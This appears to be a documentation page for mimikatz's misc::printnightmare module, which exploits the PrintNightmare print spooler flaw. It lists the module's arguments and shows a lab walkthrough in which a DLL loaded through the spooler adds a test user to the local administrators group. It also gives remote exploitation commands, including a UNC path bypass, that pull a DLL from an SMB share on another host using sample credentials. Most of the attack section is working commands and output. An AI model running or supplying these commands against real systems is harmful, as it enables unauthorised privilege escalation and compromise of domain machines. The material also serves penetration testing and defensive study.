Links

printnightmare

misc::printnightmare can be used to exploit the PrintNightMare vulnerability in both [MS-RPRN RpcAddPrinterDriverEx] and [MS-PAR AddPrinterDriverEx]. The bug was discovered by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370). The MS-PAR function was discovered by cube0x0. It has the following command line arguments:
  • /server: the target server or workstation to exploit
  • /x64 or /win64: the target server or workstation is 64 bit
  • /x86 or /win32: the target server or workstation is 32 bit
  • /library: the DLL to use during exploitation
  • /authuser: the username to use during exploitation
  • /authdomain: the active directory domain
  • /authpassword: the password of the user
  • /clean: clean-up the operation
The following example demonstrates local privilege escalation through printnightmare. As can be seen, the test user is not part of the local administrators group on the Win10.hacklab.local machine:
PS C:\Users\m3g9tr0n> net user
User accounts for \\WIN10
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
test vs2022 WDAGUtilityAccount
The command completed successfully.
PS C:\Users\m3g9tr0n> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
hacklab\Domain Admins
hacklab\m3g9tr0n
vs2022
The command completed successfully.
After successful exploitation of printnightmare:
mimikatz # misc::printnightmare /library:C:\Users\Public\DLL.dll
[ms-rprn/ncalrpc] local
> RpcGetPrinterDriverDirectory: C:\Windows\system32\spool\DRIVERS\x64
| mimikatz-{55911f3b-474e-4b31-bb55-a2a6b4fc1e76}-legitprinter / Windows x64 - 0x00008018 - C:\Users\Public\DLL.dll
> RpcAddPrinterDriverEx: OK!
> RpcDeletePrinterDriverEx: OK!
The test user is now part of the local administrators group:
PS C:\Users\m3g9tr0n> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
hacklab\Domain Admins
hacklab\m3g9tr0n
test
vs2022
The command completed successfully.
For remote exploitation, the following can be used:
mimikatz # misc::printnightmare /server:dc.hacklab.local /library:\\win10.hacklab.local\smb\x64\mimilib.dll /authuser:optimus /authpassword:Super_SecretPass1! /authdomain:hacklab.local
With the UNC path bypass:
mimikatz # misc::printnightmare /server:dc.hacklab.local /library:\??\UNC\win10.hacklab.local\smb\x64\mimilib.dll /authuser:optimus /authpassword:Super_SecretPass1! /authdomain:hacklab.local
Last modified 2yr ago